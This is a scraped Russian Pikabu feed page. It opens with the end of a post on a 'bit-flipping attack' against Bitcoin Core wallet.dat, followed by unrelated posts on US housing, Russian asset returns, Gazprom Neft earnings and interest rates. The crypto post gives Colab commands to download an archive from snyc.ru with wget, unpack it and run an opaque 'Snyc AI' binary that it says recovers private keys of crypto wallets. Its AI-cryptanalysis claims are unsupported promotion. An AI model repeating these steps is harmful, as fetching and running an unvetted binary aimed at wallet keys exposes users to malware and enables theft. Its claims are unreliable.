Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Запуск демона Bitcoin Core (bitcoind) в фоновом режиме. Демон — это серверная часть программного обеспечения Bitcoin Core, которая синхронизируется с сетью Биткоин, загружает блокчейн, обрабатывает транзакции и поддерживает работу узла в сети. Ключ -daemon означает, что процесс запустится в фоновом режиме и не будет блокировать консоль, позволяя вам продолжать работу в терминале.

  • Результат в терминале обычно минимальный — команда запускается, и управление сразу возвращается пользователю, без дополнительных сообщений. Логи и процессы работы демона будут записываться в системные логи или в файлы логов Bitcoin Core в каталоге данных (обычно ~/.bitcoin). Если запуск удался, процесс bitcoind будет активен в фоне и поддерживать сетевое взаимодействие с другими узлами блокчейна.

  • Научное понимание: запуск демона bitcoind является ключевым этапом в работе полноценного узла (full node) сети Биткоин. Узел обеспечивает децентрализованность и безопасность сети, проверяя все транзакции и блоки с использованием криптографических алгоритмов и протоколов консенсуса. Фоновый режим позволяет узлу непрерывно поддерживать актуальное состояние блокчейна, выполнять валидацию данных и откликаться на запросы через JSON-RPC интерфейс для взаимодействия с другими программами и пользователем.

  • ./bitcoind — запускает исполняемый файл демона bitcoind из текущего каталога (использование ./ указывает, что файл находится в текущей директории).

  • -daemon — параметр запуска, переводящий процесс в фоновый режим (демон) без блокировки терминала.

Команда ./bitcoind -daemon позволяет развернуть работающий Bitcoin узел, поддерживающий сеть, с автоматической синхронизацией данных и откликом на RPC-запросы, что является фундаментом для работы с криптовалютой на локальной машине Google Colab.


Данный набор команд в Google Colab предоставляет полный цикл установки и запуска инструментов Bitcoin Core (bitcoin-cli и bitcoind), необходимых для управления криптовалютой и проведения исследований (в том числе атак или восстановления доступа), в условиях облачной вычислительной среды. Основываясь на этих шагах, исследователь получает программный интерфейс для взаимодействия с сетью и локальным wallet.dat через RPC команды, что критично для научных и практических задач в криптографии и блокчейне.


Инструмент для криптоанализа Snyc AI


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка и установка инструмента Snyc AI

Подробное описание всех команд и действий терминала

Команды:

!wget https://snyc.ru/repositories/neuralnet_tools.zip

Команда wget — это мощная консольная утилита для загрузки файлов из сети через протоколы HTTP, HTTPS и FTP. Здесь она используется для загрузки архива neuralnet_tools.zip с сервера по указанному URL. Команда wget работает в неинтерактивном режиме, что позволяет скачивать файлы без участия пользователя, включая возможность возобновления прерванных загрузок. Это особенно важно при работе с большими файлами или нестабильным интернет-соединением. Его кроссплатформенность и простота делают wget незаменимым инструментом для автоматизации и управления загрузками в научных вычислениях и обработки данных.


Эта команда извлекает все файлы из neuralnet_tools.zip:

!unzip neuralnet_tools.zip

Команда unzip распаковывает содержимое ZIP-архива в текущую рабочую директорию. Формат ZIP широко используется для сжатия и архивирования данных без потерь, что помогает экономить дисковое пространство и облегчать передачу больших наборов файлов. Распаковка архива позволяет получить доступ к инструментам и скриптам, которые находятся внутри, для дальнейшего использования в задачах анализа или декодирования. Этот этап — стандартная процедура при подготовке программного обеспечения к использованию в средах разработки и исследовательских проектах.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим команду ls для быстрого и удобного просмотра:

ls

Команда ls выводит список файлов и папок в текущей директории. Эта базовая Unix-команда служит для проверки содержимого каталога, помогая убедиться в успешной загрузке и распаковке архива. В контексте научных исследований или программирования она облегчает навигацию по файловой системе и подтверждение наличия нужных данных или инструментов.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск инструмента Snyc AI:

!./snyc

Запуск инструмента Snyc AI в Google Colab позволяет использовать алгоритмы глубокого сканирования и восстановления данных, таких как секретные и приватные ключи для различных криптокошельков, с помощью методов искусственного интеллекта. Такие технологии основаны на машинном обучении и нейронных сетях, что обеспечивает высокую точность и безопасность при криптоанализе критически важных данных.

Если будете запускать эти команды в Google Colab, важно помнить, что:

  • Префикс ! позволяет выполнять системные (shell) команды непосредственно из ячеек программирования. Это делает Colab мощной платформой для гибридного использования различных языков программирование и командной строки.

  • При работе с внешними архивами и утилитами полезно проверять права доступа и содержимое файлов для безопасности и совместимости.

  • Инструмент Snyc AI является специализированным программным обеспечением для анализа криптографических данных, использующим современные возможности ИИ и нейросетей для повышения эффективности и надежности.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Опубликованы две части [№1] , [№2] исследования


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/3uCsL_zxKPI

Video tutorial: https://dzen.ru/video/watch/68baca013761775f268041dc

Источник: https://cryptodeeptool.ru/bit-flipping-attack-on-wallet-dat


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Показать полностью 22 1
Криптовалюта Финансовая грамотность Биткоины YouTube Трейдинг Арбитраж криптовалюты Заработок в интернете Заработок Вклад Облигации Пассивный доход Дивиденды Ключевая ставка Валюта Инвестиции в акции Видео Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
2
4
krasikov944krasi
krasikov944krasi
5 дней назад
Лига биржевой торговли

Жильё стало роскошью⁠⁠

В 1985 году новый дом в США стоил около 3,6 годовых доходов семьи. Сегодня — уже 5,3. Доходы почти не выросли, а цены на жильё и налоги на недвижимость улетели вверх. Именно с этих налогов финансируются школы, и на них выпускаются специальные «школьные облигации».

Жильё стало роскошью Доллары, Инфляция, Валюта, Облигации, Дивиденды, Аналитика

Митч Векслер, девелопер (август 2025):

«Объём несостоятельных школьных долгов перевалил за $5 трлн. Большая часть новых выпусков идёт не на строительство, а на погашение старых долгов».

Фактически семьи платят всё больше налогов с завышенных оценок домов, которых не поддерживают реальные доходы. Если начнутся массовые неплатежи, бюджеты школьных округов не выдержат, и рухнет вся система муниципальных облигаций.

Вывод: речь идёт уже не о доступности жилья, а о стабильности финансовой архитектуры США.

НАШ ТГ КАНАЛ: https://t.me/+KvGj2ztTTNMxNTMy

Показать полностью 1
[моё] Доллары Инфляция Валюта Облигации Дивиденды Аналитика
10
0
withfinance
withfinance
5 дней назад

ТОП-5 самых доходных активов августа: появился новый лидер⁠⁠

Банк России опубликовал статистику за август по доходности разных классов активов. Итоги следующие:

➡️ Новый лидер августа: В августе акции обогнали облигации по доходности

➡️ С начала 2025 года: В лидерах всё еще корпоративные облигации (до +30%) и ОФЗ (+19,5%).

🔼 ТОП-5 самых доходных активов:

1️⃣ Акции телекомов: +9,9%

2️⃣ Акции электроэнергетики: +9,0%

3️⃣ Акции ретейлеров: +8,9%

4️⃣ Акции нефтегаза: +8,3%

5️⃣ Акции транспорта: +7,4%

🔼 Доходность других инструментов:

• Индекс МосБиржи (IMOEX): +6,2%
• Корпоративные облигации (в зависимости от рейтинга): +1,4–2,4%
• ОФЗ: +0,7%
• Рублевые депозиты: +1,4%

🔽Инструменты с отрицательной доходностью:

• Валютные депозиты (доллар): -1,7%
• Валютные депозиты (евро): -0,9%
• Валютные депозиты (юанях): — 0,7%

не инвестиционная рекомендация

Если полезно, ставьте ❤️ Также предлагаю подписаться на этот блог.

Ещё интересные статьи:

  • Снова будем богатеть?: чем порадуют компании инвесторов этой осенью

  • Новые облигации от Альфа-Банк с доходностью до 17,75%: ищем подвохи

  • Нашла новый выпуск облигаций с доходностью до 17,5% и высоким рейтингом: сохраняем высокую доходность надолго

  • Бегство из фондов продолжается: инвесторы меняют свои предпочтения

  • Долг в 1 трлн рублей: стоит ли покупать акции «Магнита» после провального отчета?

  • Экономика по новым правилам: свежий прогноз от ЦБ. Что ждать инвесторам?

  • Почти 70% инвесторов в России считают пенсию лишь «подушкой безопасности»

  • Аналитики назвали ТОП-10 акций: кого-то разжаловали, а кто-то получил повышение

Подписывайтесь на мой телеграм канал, в нем:

— делаю обзоры на ценные бумаги и облигации;
— делаю подборки ТОП инструментов по перспективам роста, по дивидендам;
— делаю разборы отчетности компаний и их перспектив;
— по выходным разбираем кейсы, которые помогут понять, как эффективнее управлять своим портфелем;
— публикую график важных для инвестора события перед началом новой недели.

Показать полностью
[моё] Акции Инвестиции Инвестиции в акции Биржа Облигации Вклад Валюта Текст
0
4
svoiinvestor
svoiinvestor
5 дней назад
Лига Инвесторов

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды?⁠⁠

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

🛢 ГПН представила нам финансовые результаты за I полугодие и II квартал 2025 г. Сокращённый отчёт получился ожидаемо слабым, фин. положение эмитента продолжает ухудшаться, из-за этого аппетиты Газпрома (главный мажоритарий) по выплате дивидендов были сокращены, в прошлой разборке я предупреждал, что payout может сократится до 50%, но без сюрпризов по выкачке денег с "дочки" не обошлось:

🛢️ Выручка: I п. 1,8₽ трлн (-12,1% г/г), II кв. 884₽ млрд (-15,1% г/г)
🛢️ EBITDA: I п. 510,1₽ млрд (-27,6% г/г), II кв. 238,1₽ млрд (-32,1% г/г)
🛢️ Чистая прибыль: I п. 150,5₽ млрд (-54,2% г/г), II кв. 57,8₽ млрд (-65,8% г/г)

💬 Компания предоставила сокращённые операционные данные — добыча углеводородов увеличилась во II кв. на 4,5%, а объём переработки на 6%. РФ в 2024 г. 6 месяцев не придерживалась плана сокращения, поэтому в 2025 г., начиная с I кв. происходила компенсация по добыче за ранее превышенные квоты, но со II кв. РФ уже начала наращивать добычу. По нефтепродуктам — демпферные выплаты за II кв. 2025 г. составили 143 млрд (-73,9% г/г), катастрофическое падение. Средний курс $ во II кв. 2025 г. — 80,8₽, в 2024 г. — 90,4₽, средняя цена Urals во II кв. 2025 г. — 55,5$, в 2024 г. — 70,6$.

💬 Думаю к падению выручки не должны возникнуть вопросы. Опер. расходы снизились до 792,1₽ млрд (-6,6% г/г, темпы сокращения меньше, чем в выручке). На это повлияли статьи: производственные расходы — 133,2₽ млрд (+5,7% г/г), амортизация — 112,1₽ млрд (+12,1% г/г) и транспортные расходы — 72,7₽ млрд (-5,5% г/г). Как итог опер. прибыль снизилась до 92₽ млрд (-52,4% г/г).

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

💬 Падение чистой прибыли ускорил убыток в совместных предприятиях (Арктикгаз, Славнефть и др.) -779₽ млн (годом ранее прибыль в 13,9₽ млрд), разница финансовых доходов/расходов -18₽ млрд (огромный долг и высокая ключевая ставка, годом ранее -4,8₽ млрд) и ускорившийся убыток в ~3 раза в прочих расходах -5,9₽ млрд (годом ранее -2,2₽ млрд). Курсовые разницы принесли +12,8₽ млрд (₽ значительно укрепился, некоторые долги компании номинированы в валюте, год назад +16₽ млрд).

💬 Кэш на счетах увеличился до 226,4₽ млрд (в I кв. 2025 г. — 132,8₽ млрд). Долг увеличился до 1,035₽ трлн (в I кв. 2025 г. — 936,1₽ млрд). Показатель чистый долг/EBITDA составил — 0,78x, выплата дивидендов в долг до добра не доводит.

💬 OCF снизился до 154,3₽ млрд (-39% г/г), падение сократил приток денег в оборотный капитал (+47,1₽ млрд vs. +22,4₽ млрд годом ранее, видимо, рассчитались по дебиторке и распродали запасы), CAPEX значительно сократили во II кв. — 43,8₽ млрд (-68,5% г/г), но не торопитесь аплодировать менеджменту ГПН за это действие, потому что 105,4₽ млрд были направлены на погашение строительства (видимо деньги пошли на проект Лахта-2). FCF во II кв. положительный 110,5₽ млрд (-3,2% г/г), FCF за I полугодие составил 37₽ млрд (-77% г/г), то есть свободных денег хватает на выплату 7,8₽ на акцию в виде дивиденда за I п. Но мы уже знаем, что СД ГПН рекомендует выплатить за I п. 2025 г. 17,3₽ на акцию, согласно див. политике основу для выплаты составляет чистая прибыль, но если раньше платили 75% от ЧП, то сейчас направили чуть более 50% (опять же дивиденды заплатят в долг).

Газпромнефть отчиталась за II кв. 2025 г. — цена на нефть, укрепление рубля и SDN санкции продолжают ухудшать фин. положение. Дивиденды? Политика, Фондовый рынок, Биржа, Инвестиции, Аналитика, Экономика, Инвестиции в акции, Газпром, Нефть, Газ, Валюта, Доллары, Санкции, Отчет, Облигации, Дивиденды, Ключевая ставка, Рубль, Долг, Налоги, Длиннопост

📌 В августе восьмёрка стран ОПЕК+ увеличили квоты на добычу в сентябре, Россия в сентябре сможет добывать 9,45 млн б/с. Цена Urals держится у 60$ за баррель, а ₽ не сильно ослаб (сейчас где-то 80₽ за $). Долг компании перевалил за 1₽ трлн, а % расходы во II кв. увеличились в двое — 30,8₽ млрд. Сокращение payouta до 50% это великолепно, но дивиденды всё равно будут выплачены в долг (логичнее всего перейти на выплату от FCF), так же как и снижение инвестиций отлично, но 100₽ млрд были "изъяты" на игрушку Газпрома. Ситуация такая, что ГПН начинает превращаться по фин. положению в Газпром — печально.

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью 3
[моё] Политика Фондовый рынок Биржа Инвестиции Аналитика Экономика Инвестиции в акции Газпром Нефть Газ Валюта Доллары Санкции Отчет Облигации Дивиденды Ключевая ставка Рубль Долг Налоги Длиннопост
3
0
PNIPU
PNIPU
5 дней назад

Ученая Пермского Политеха рассказала, насколько вероятно новое снижение ключевой ставки⁠⁠

Годовая инфляция в России продолжает снижаться: по данным журнала «Финуслуги» от Московской биржи она опустилась с 9,40% (в июне) до 8,79 %. Эта динамика позволяет ЦБ продолжить цикл смягчения денежно-кредитной политики. Ожидается, что на заседании 12 сентября ключевая ставка будет вновь снижена. Ученая Пермского Политеха рассказала, как это решение отразится на населении и бизнесе.

Основной причиной смягчения политики Центробанка может стать снижение потребительского спроса: долгое время кредиты были очень дорогими, поэтому компании и люди почти перестали брать деньги взаймы у финансовых организаций, что и затормозило экономику.

– Теперь, когда цель по сдерживанию инфляции достигнута, Центробанк может начать цикл снижения ставки, чтобы поддержать экономический рост. Подтверждением этого стал пересмотренный среднесрочный (от 1 до 5 лет) прогноз: если в апреле ключевую ставку до конца года видели в диапазоне 18,8-21,8 %, то теперь прогноз смягчен до 16,3-18 %. Ожидается, что в 2026 году ставка опустится до уровня 12-13 %, – рассказывает Юлия Стародумова, старший преподаватель кафедры «Экономика и финансы» Пермского Политеха.

Для физических лиц снижение ключевой ставки будет иметь двойственный эффект. С одной стороны, начнут постепенно дешеветь кредиты, в первую очередь ипотечные и потребительские, что повысит их доступность. С другой стороны, неизбежно снизится и доходность по банковским вкладам и сделает сбережения менее привлекательными.

– Это подтолкнет людей более активно тратить деньги, однако, рост покупательской способности и потребительской активности проявится не сразу, а лишь через несколько месяцев, к концу 2025 года. При этом в краткосрочной перспективе, с сентября по декабрь, цены традиционно будут расти, возможно, даже с небольшим опережением инфляции, – комментирует Юлия Стародумова.

Для бизнеса же новости исключительно позитивные. Снижение ключевой ставки означает удешевление кредитов для компаний. Предприятия смогут брать более доступные займы на пополнение оборотных средств, запуск новых проектов, расширение производства и модернизацию оборудования. Это прямой стимул для инвестиционной активности, которая является главным драйвером долгосрочного и сбалансированного экономического роста. Также доступность более выгодных условий кредитования поспособствует появлению новых игроков на рынке, что усилит конкуренцию. Компании будут вынуждены адаптироваться, снижая цены или улучшая качество продукции, чтобы удержать клиентов.

Однако ключевой момент, на который обращает внимание эксперт, – это отсроченный эффект.

– Результаты снижения ставки не проявятся моментально. Потребуется время, чтобы изменения дошли до конечных заемщиков в виде конкретных кредитных предложений, и чтобы эти изменения отразились на макроэкономической статистике. Главная цель — сделать так, чтобы экономика росла стабильно, а не рывками. По прогнозам ЦБ, ужесточение денежно-кредитных условий будет достаточно, чтобы к 2026 году снизить инфляцию до целевого уровня, а замедление роста кредитования обеспечит дальнейшее снижение внутреннего спроса, что и заложит фундамент для здорового экономического развития, – рассказывает ученая ПНИПУ.

Показать полностью
Валюта Нефть Аналитика Текст
1
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии